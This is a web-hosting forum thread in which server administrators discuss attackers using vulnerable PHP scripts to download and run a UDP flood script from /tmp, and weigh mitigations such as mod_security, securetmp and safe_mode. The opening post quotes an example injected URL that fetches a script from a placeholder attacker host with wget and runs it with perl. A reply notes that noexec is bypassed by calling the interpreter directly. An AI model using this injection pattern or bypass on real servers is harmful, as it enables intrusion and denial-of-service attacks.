More /tmp Security Problems.

HostDime

HostDime

Well-Known Member
PartnerNOC
Mar 15, 2003
77
0
156
Orlando, Florida
Now before anyone yells, all our servers have /tmp noexec,nosuid,nodev. This is all good for compiling, running programs but heres the problem now... Many writers are writing insecure PHP journal scripts, and many other php programs which are vunerable. Lately I saw udp.pl on a server when it was a little slow. It seems they had gotten the program installed via

http://userssite.com/index.php?x=cd /tmp;wget mysuperhackerpalace.com/udp.pl;/usr/bin/perl udp.pl 127.0.0.1

Now thats not the exact script, their site, and they didnt DDos localhost. Im giving everyone an idea. Now... Anyone really poses a threat on your server now. Simple PHP Shell + udp.pl = DDos. And even if the person did not do it (the case with the insecure php script, every account poses a threat. I have basically just been searching logs, /tmp for any traces for now. What could be a fix on this? Could you somehow make perl not run scripts from tmp? Sigh.

:rolleyes:
 
M

Marty

Well-Known Member
Oct 10, 2001
629
1
318
mmm, that is interesting.

I think mod_security would probably deflect the request before they were able to upload. We just started running this on our servers.

www.modsecurity.org
 
J

jamesbond

Well-Known Member
Oct 9, 2002
737
1
168
If wget is not used by any users (except for root) then a simple fix would be to chmod wget to 700.
 
S

Silverado

Well-Known Member
Mar 19, 2003
153
0
166
Backyard - Poolside
doesn't /scripts/securetmp take good care of this issue?

I used it on all my servers and it works great.
 
rs-freddo

rs-freddo

Well-Known Member
May 13, 2003
828
1
168
Australia
cPanel Access Level
Root Administrator
If you use the securetmp system it basically stops:
/tmp/hacker.pl
from being executed
however it does not stop:
/usr/bin/perl /tmp/hacker.pl
why?
because in the first instance you are executing a script in /tmp
in the second instance you are executing software in /usr/bin and just parsing the file in /tmp.

This is why I'm pushing cPanel for a chrooted filesystem. Securetmp will only work for the REALLY DUMB hackers. Securetmp is only a very temporary bandaid.
 
W

Website Rob

Well-Known Member
Mar 23, 2002
1,501
1
318
Alberta, Canada
cPanel Access Level
Root Administrator
As security is done in layers, having safe_mode "ON" would have prevented the upload to the 'tmp' and stopped the problem before it could start. Others may not agree with using this method, but I have found majority of scripts (PHP) do not require it to be "OFF" and those that do make a request so it can be setup -- for their account.

Keeping track of who has safe_mode "OFF" makes it easy to track, when 'tmp' is used for nefarious purposes.
 
You must log in or register to reply here.
Thread starter Similar threads Forum Replies Date
EagleDotNet How to give the cpanel user more privilege Security 7
K In Progress CPANEL-37526 - SECURED_DOMAIN_DCV_FAILURE: One or more currently-secured domains failed DCV. Security 6
000 more of 250 attacks to MySQL from 'root'@'189.112.244.234' why my cPanel/server NO blocked this address from attempt 10 ? Security 3
R how to make my site more safe ? Security 2
C AutoSSL txt validation file not created anymore Security 4
Similar threads
How to give the cpanel user more privilege
In Progress CPANEL-37526 - SECURED_DOMAIN_DCV_FAILURE: One or more currently-secured domains failed DCV.
more of 250 attacks to MySQL from 'root'@'189.112.244.234' why my cPanel/server NO blocked this address from attempt 10 ?
how to make my site more safe ?
AutoSSL txt validation file not created anymore
Top Bottom